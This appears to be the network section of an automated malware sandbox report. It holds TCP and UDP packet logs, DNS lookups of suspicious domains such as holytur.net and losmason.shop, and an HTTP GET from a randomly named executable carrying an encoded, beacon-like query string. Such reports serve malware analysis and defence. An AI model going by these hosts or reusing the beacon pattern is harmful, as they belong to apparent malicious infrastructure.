                                                            Jan 11, 2025 04:17:13.566607952 CET4998280192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:13.583718061 CET4998280192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:13.588551044 CET8049982104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:14.012012005 CET8049982104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:14.012075901 CET8049982104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:14.012113094 CET8049982104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:14.012146950 CET8049982104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:14.012200117 CET8049982104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:14.012237072 CET8049982104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:14.012290001 CET4998280192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:14.012372017 CET4998280192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:14.012723923 CET8049982104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:14.012792110 CET4998280192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:15.093487978 CET4998280192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:16.111977100 CET4998380192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:16.117033958 CET8049983104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:16.117152929 CET4998380192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:16.132200003 CET4998380192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:16.137129068 CET8049983104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:16.576186895 CET8049983104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:16.576250076 CET8049983104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:16.576291084 CET8049983104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:16.576324940 CET8049983104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:16.576339960 CET4998380192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:16.576360941 CET8049983104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:16.576383114 CET4998380192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:16.576399088 CET8049983104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:16.576451063 CET4998380192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:16.576725006 CET8049983104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:16.576787949 CET4998380192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:17.640120983 CET4998380192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:18.658776045 CET4998480192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:18.663806915 CET8049984104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:18.663909912 CET4998480192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:18.677880049 CET4998480192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:18.682768106 CET8049984104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:18.682939053 CET8049984104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:19.121052980 CET8049984104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:19.121128082 CET8049984104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:19.121144056 CET8049984104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:19.121222973 CET4998480192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:19.121289968 CET8049984104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:19.121305943 CET8049984104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:19.121320963 CET8049984104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:19.121335983 CET8049984104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:19.121345043 CET4998480192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:19.121364117 CET4998480192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:19.121397972 CET4998480192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:20.187063932 CET4998480192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:21.205681086 CET4998580192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:21.210726023 CET8049985104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:21.210835934 CET4998580192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:21.220016003 CET4998580192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:21.224963903 CET8049985104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:21.661411047 CET8049985104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:21.661655903 CET8049985104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:21.661721945 CET4998580192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:21.664151907 CET4998580192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:21.668921947 CET8049985104.18.73.116192.168.2.7
                                                            Jan 11, 2025 04:17:26.997443914 CET4998680192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:27.002443075 CET8049986192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:27.002576113 CET4998680192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:27.017071962 CET4998680192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:27.021987915 CET8049986192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:28.228260040 CET8049986192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:28.228353024 CET8049986192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:28.228367090 CET8049986192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:28.228388071 CET8049986192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:28.228399992 CET8049986192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:28.228411913 CET8049986192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:28.228425026 CET8049986192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:28.228437901 CET8049986192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:28.228466988 CET4998680192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:28.228519917 CET4998680192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:28.228610992 CET8049986192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:28.228625059 CET8049986192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:28.228682041 CET4998680192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:28.233323097 CET8049986192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:28.247891903 CET8049986192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:28.247905970 CET8049986192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:28.247955084 CET4998680192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:28.315947056 CET8049986192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:28.315973997 CET8049986192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:28.316036940 CET8049986192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:28.316052914 CET4998680192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:28.316055059 CET8049986192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:28.316112041 CET4998680192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:28.316152096 CET8049986192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:28.316301107 CET8049986192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:28.316320896 CET8049986192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:28.316353083 CET4998680192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:28.316617012 CET8049986192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:28.316672087 CET4998680192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:28.316721916 CET8049986192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:28.316776991 CET4998680192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:28.531176090 CET4998680192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:29.551337957 CET4998780192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:29.556246996 CET8049987192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:29.556384087 CET4998780192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:29.577096939 CET4998780192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:29.581959009 CET8049987192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:30.351012945 CET8049987192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:30.351048946 CET8049987192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:30.351058960 CET8049987192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:30.351099014 CET4998780192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:30.351129055 CET8049987192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:30.351145029 CET8049987192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:30.351263046 CET4998780192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:30.351274967 CET8049987192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:30.351288080 CET8049987192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:30.351300001 CET8049987192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:30.351351023 CET8049987192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:30.351362944 CET4998780192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:30.351363897 CET8049987192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:30.351363897 CET4998780192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:30.351474047 CET4998780192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:30.355911016 CET8049987192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:30.370824099 CET8049987192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:30.370836020 CET8049987192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:30.370873928 CET4998780192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:30.438064098 CET8049987192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:30.438087940 CET8049987192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:30.438098907 CET8049987192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:30.438152075 CET4998780192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:30.438225985 CET8049987192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:30.438239098 CET8049987192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:30.438368082 CET4998780192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:30.438570023 CET8049987192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:30.438611984 CET4998780192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:30.438618898 CET8049987192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:30.438811064 CET4998780192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:31.093606949 CET4998780192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:32.112035990 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:32.116975069 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.117125988 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:32.136231899 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:32.141087055 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.141249895 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.930345058 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.930368900 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.930381060 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.930438042 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.930450916 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.930452108 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:32.930506945 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:32.930598974 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.930646896 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:32.930649996 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.930664062 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.930677891 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.930705070 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.930710077 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:32.930763006 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:32.935276985 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.935297966 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.935368061 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:32.950774908 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.950807095 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.950875998 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:33.017296076 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:33.017343044 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:33.017406940 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:33.017422915 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:33.017458916 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:33.017493963 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:33.017508030 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:33.017529011 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:33.017575026 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:33.017776966 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:33.017878056 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:33.017925978 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:33.642508030 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:34.658907890 CET4998980192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:34.664098978 CET8049989192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:34.664241076 CET4998980192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:34.673593044 CET4998980192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:34.678459883 CET8049989192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:35.270965099 CET8049989192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:35.271169901 CET8049989192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:35.271262884 CET4998980192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:35.273895979 CET4998980192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:35.278861046 CET8049989192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:40.299060106 CET4999080192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:40.304035902 CET804999013.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:40.304163933 CET4999080192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:40.320976019 CET4999080192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:40.325824022 CET804999013.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:40.763919115 CET804999013.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:40.763978958 CET804999013.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:40.765853882 CET4999080192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:41.831217051 CET4999080192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:42.846554041 CET4999180192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:42.851531982 CET804999113.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:42.851730108 CET4999180192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:42.866703033 CET4999180192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:42.871649981 CET804999113.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:43.321705103 CET804999113.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:43.321737051 CET804999113.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:43.321805000 CET4999180192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:44.374587059 CET4999180192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:45.393651009 CET4999280192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:45.398633003 CET804999213.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:45.398746967 CET4999280192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:45.421041965 CET4999280192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:45.425955057 CET804999213.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:45.426067114 CET804999213.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:45.866480112 CET804999213.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:45.866651058 CET804999213.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:45.866714001 CET4999280192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:46.937349081 CET4999280192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:47.956041098 CET4999380192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:47.961069107 CET804999313.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:47.961143017 CET4999380192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:47.971817970 CET4999380192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:47.976763010 CET804999313.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:53.430593967 CET804999313.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:53.430696964 CET804999313.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:53.430763006 CET4999380192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:53.433779955 CET4999380192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:53.438633919 CET804999313.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:58.456650019 CET4999480192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:17:58.461507082 CET804999415.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:17:58.461579084 CET4999480192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:17:58.476680040 CET4999480192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:17:58.481584072 CET804999415.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:17:58.927802086 CET804999415.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:17:58.927856922 CET804999415.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:17:58.927917004 CET4999480192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:17:59.984040022 CET4999480192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:01.003422022 CET4999580192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:01.008284092 CET804999515.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:01.008420944 CET4999580192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:01.027430058 CET4999580192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:01.032242060 CET804999515.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:01.489027977 CET804999515.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:01.489125967 CET804999515.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:01.489180088 CET4999580192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:02.531420946 CET4999580192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:03.552736044 CET4999680192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:03.557600021 CET804999615.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:03.557666063 CET4999680192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:03.576286077 CET4999680192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:03.581088066 CET804999615.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:03.581217051 CET804999615.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:04.955147982 CET804999615.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:04.955323935 CET804999615.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:04.955418110 CET4999680192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:05.827828884 CET4999680192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:06.846808910 CET4999780192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:06.851723909 CET804999715.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:06.851830959 CET4999780192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:06.862514019 CET4999780192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:06.867394924 CET804999715.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:07.308546066 CET804999715.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:07.308603048 CET804999715.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:07.308748007 CET4999780192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:07.311508894 CET4999780192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:07.316355944 CET804999715.197.148.33192.168.2.7

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 11, 2025 04:16:44.119731903 CET5535253192.168.2.71.1.1.1
                                                            Jan 11, 2025 04:16:44.315184116 CET53553521.1.1.1192.168.2.7
                                                            Jan 11, 2025 04:17:00.143490076 CET4956353192.168.2.71.1.1.1
                                                            Jan 11, 2025 04:17:00.161803961 CET53495631.1.1.1192.168.2.7
                                                            Jan 11, 2025 04:17:13.533971071 CET5647153192.168.2.71.1.1.1
                                                            Jan 11, 2025 04:17:13.558950901 CET53564711.1.1.1192.168.2.7
                                                            Jan 11, 2025 04:17:26.674998045 CET5010953192.168.2.71.1.1.1
                                                            Jan 11, 2025 04:17:26.994784117 CET53501091.1.1.1192.168.2.7
                                                            Jan 11, 2025 04:17:40.284461021 CET6545153192.168.2.71.1.1.1
                                                            Jan 11, 2025 04:17:40.295955896 CET53654511.1.1.1192.168.2.7
                                                            Jan 11, 2025 04:17:58.441203117 CET6480453192.168.2.71.1.1.1
                                                            Jan 11, 2025 04:17:58.453977108 CET53648041.1.1.1192.168.2.7
                                                            Jan 11, 2025 04:18:12.315543890 CET5303553192.168.2.71.1.1.1
                                                            Jan 11, 2025 04:18:12.326966047 CET53530351.1.1.1192.168.2.7

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Jan 11, 2025 04:16:44.119731903 CET192.168.2.71.1.1.10xe186Standard query (0)www.holytur.netA (IP address)IN (0x0001)false
                                                            Jan 11, 2025 04:17:00.143490076 CET192.168.2.71.1.1.10xdde0Standard query (0)www.nieuws-july202488.sbsA (IP address)IN (0x0001)false
                                                            Jan 11, 2025 04:17:13.533971071 CET192.168.2.71.1.1.10xd0faStandard query (0)www.losmason.shopA (IP address)IN (0x0001)false
                                                            Jan 11, 2025 04:17:26.674998045 CET192.168.2.71.1.1.10xd888Standard query (0)www.hayaniya.orgA (IP address)IN (0x0001)false
                                                            Jan 11, 2025 04:17:40.284461021 CET192.168.2.71.1.1.10x9543Standard query (0)www.lovel.shopA (IP address)IN (0x0001)false
                                                            Jan 11, 2025 04:17:58.441203117 CET192.168.2.71.1.1.10x3987Standard query (0)www.duskgazes.workA (IP address)IN (0x0001)false
                                                            Jan 11, 2025 04:18:12.315543890 CET192.168.2.71.1.1.10x5440Standard query (0)www.zrinorem-srumimit.sbsA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Jan 11, 2025 04:16:44.315184116 CET1.1.1.1192.168.2.70xe186No error (0)www.holytur.netholytur.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 11, 2025 04:16:44.315184116 CET1.1.1.1192.168.2.70xe186No error (0)holytur.net185.106.208.3A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 04:17:00.161803961 CET1.1.1.1192.168.2.70xdde0No error (0)www.nieuws-july202488.sbsnieuws-july202488.sbsCNAME (Canonical name)IN (0x0001)false
                                                            Jan 11, 2025 04:17:00.161803961 CET1.1.1.1192.168.2.70xdde0No error (0)nieuws-july202488.sbs162.0.215.33A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 04:17:13.558950901 CET1.1.1.1192.168.2.70xd0faNo error (0)www.losmason.shop104.18.73.116A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 04:17:26.994784117 CET1.1.1.1192.168.2.70xd888No error (0)www.hayaniya.orghayaniya.orgCNAME (Canonical name)IN (0x0001)false
                                                            Jan 11, 2025 04:17:26.994784117 CET1.1.1.1192.168.2.70xd888No error (0)hayaniya.org192.185.147.100A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 04:17:40.295955896 CET1.1.1.1192.168.2.70x9543No error (0)www.lovel.shop13.248.169.48A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 04:17:40.295955896 CET1.1.1.1192.168.2.70x9543No error (0)www.lovel.shop76.223.54.146A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 04:17:58.453977108 CET1.1.1.1192.168.2.70x3987No error (0)www.duskgazes.workduskgazes.workCNAME (Canonical name)IN (0x0001)false
                                                            Jan 11, 2025 04:17:58.453977108 CET1.1.1.1192.168.2.70x3987No error (0)duskgazes.work15.197.148.33A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 04:17:58.453977108 CET1.1.1.1192.168.2.70x3987No error (0)duskgazes.work3.33.130.190A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 04:18:12.326966047 CET1.1.1.1192.168.2.70x5440No error (0)www.zrinorem-srumimit.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 04:18:12.326966047 CET1.1.1.1192.168.2.70x5440No error (0)www.zrinorem-srumimit.sbs188.114.97.3A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • www.holytur.net
                                                            • www.nieuws-july202488.sbs
                                                            • www.losmason.shop
                                                            • www.hayaniya.org
                                                            • www.lovel.shop
                                                            • www.duskgazes.work

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.749929185.106.208.3806896C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 04:16:44.380201101 CET551OUTGET /cs9k/?MHJ0GXi=W7SiLeR8lVOS0IddzXWoYXDt6RHub9Z/llH5xMN7IPTa857c9EQRUjsfmtg32BbwdcsWIPqYG66ejHdS265gqPapChlQiVLnuWWyjSHSngUOewn7sS2CIDtXVuGZPpJOLluzJeAwPaf/&nHI4y=ULkH023p-2 HTTP/1.1
                                                            Host: www.holytur.net
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Jan 11, 2025 04:16:45.093354940 CET304INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Sat, 11 Jan 2025 03:16:44 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 146
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


